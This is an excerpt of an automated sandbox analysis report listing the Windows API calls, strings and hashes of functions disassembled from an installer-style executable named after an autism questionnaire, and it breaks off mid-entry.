                                                                                              • Opcode ID: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                                              • Instruction ID: b445045a4a45572890d55b61ba1fda7f57045845c9b5a3357f52015174d7dfc9
                                                                                              • Opcode Fuzzy Hash: 5a47b888b64c9d71a21df3ce652ab4a6790a840d61fbcb63caf85f52caaf36c3
                                                                                              • Instruction Fuzzy Hash: CE01A234640605AFD710EFA8ED62E9977EAEB49721F200265F520D73D0DE74ED44CA19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID: :
                                                                                              • API String ID: 1611563598-336475711
                                                                                              • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                              • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                                              • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                              • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                                              • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                                                              • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                                              • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                                              • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                              • String ID:
                                                                                              • API String ID: 2814369299-0
                                                                                              • Opcode ID: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
                                                                                              • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                                                              • Opcode Fuzzy Hash: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
                                                                                              • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                                              • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2132507429-0
                                                                                              • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                                              • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                                                              • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                                              • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                                                              • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$Move
                                                                                              • String ID: isRS-%.3u.tmp
                                                                                              • API String ID: 3839737484-3657609586
                                                                                              • Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                                              • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                                                              • Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                                              • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 0060C08C
                                                                                              • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastProcess
                                                                                              • String ID: >Mb$XMb
                                                                                              • API String ID: 2919029540-2660256435
                                                                                              • Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                                              • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                                                              • Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                                              • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32 ref: 006B6A05
                                                                                              • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                                                                • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateErrorHandleLastProcess
                                                                                              • String ID: (\m$D
                                                                                              • API String ID: 3798668922-1981685662
                                                                                              • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                                              • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                                                              • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                                              • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                                                              • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Type$FullLoadNamePathRegister
                                                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                                                              • API String ID: 4170313675-2435364021
                                                                                              • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                                              • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                                                              • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                                              • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                                                                • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                                                • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                                                • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                                                • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                              • String ID: DeleteFile$MoveFile
                                                                                              • API String ID: 3947864702-139070271
                                                                                              • Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                                              • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                                                              • Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
                                                                                              • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A
                                                                                                • Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3
                                                                                                • Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3
                                                                                              • GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1
                                                                                                • Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
                                                                                                • Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                              • String ID: \UA$dUA
                                                                                              • API String ID: 503893064-3864016770
                                                                                              • Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                                              • Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
                                                                                              • Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
                                                                                              • Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
                                                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73
                                                                                                • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
                                                                                                • Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Thread$LanguagesPreferred$Language
                                                                                              • String ID:
                                                                                              • API String ID: 2255706666-0
                                                                                              • Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                                              • Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
                                                                                              • Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
                                                                                              • Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32 ref: 005B95A3
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
                                                                                              • SetWindowLongW.USER32 ref: 005B95FF
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Window$Long$Visible
                                                                                              • String ID:
                                                                                              • API String ID: 2967648141-0
                                                                                              • Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                                              • Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
                                                                                              • Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
                                                                                              • Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
                                                                                              • LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
                                                                                              • SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
                                                                                              • LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                                              • Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
                                                                                              • Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
                                                                                              • Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000000), ref: 0050E96E
                                                                                              • GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
                                                                                              • GetPropW.USER32 ref: 0050E99A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2582817389-0
                                                                                              • Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                                              • Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
                                                                                              • Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
                                                                                              • Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
                                                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
                                                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                              • String ID:
                                                                                              • API String ID: 215268677-0
                                                                                              • Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                                              • Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
                                                                                              • Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
                                                                                              • Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 004F5551
                                                                                              • SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
                                                                                              • GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
                                                                                              • ReleaseDC.USER32 ref: 004F557F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsObjectReleaseSelectText
                                                                                              • String ID:
                                                                                              • API String ID: 2013942131-0
                                                                                              • Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                                              • Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
                                                                                              • Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
                                                                                              • Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window
                                                                                              • String ID: /INITPROCWND=$%x $@
                                                                                              • API String ID: 2353593579-4169826103
                                                                                              • Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                                              • Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
                                                                                              • Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
                                                                                              • Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(FYC), ref: 00435618
                                                                                                • Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocInitStringVariant
                                                                                              • String ID: FYC$kYC
                                                                                              • API String ID: 4010818693-1629163012
                                                                                              • Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                                              • Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
                                                                                              • Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
                                                                                              • Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                                                • Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58
                                                                                                • Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F
                                                                                              • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
                                                                                              • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07
                                                                                              Strings
                                                                                              • Detected restart. Removing temporary directory., xrefs: 006B8CBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                              • String ID: Detected restart. Removing temporary directory.
                                                                                              • API String ID: 1717587489-3199836293
                                                                                              • Opcode ID: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
                                                                                              • Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
                                                                                              • Opcode Fuzzy Hash: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
                                                                                              • Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                                • Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc
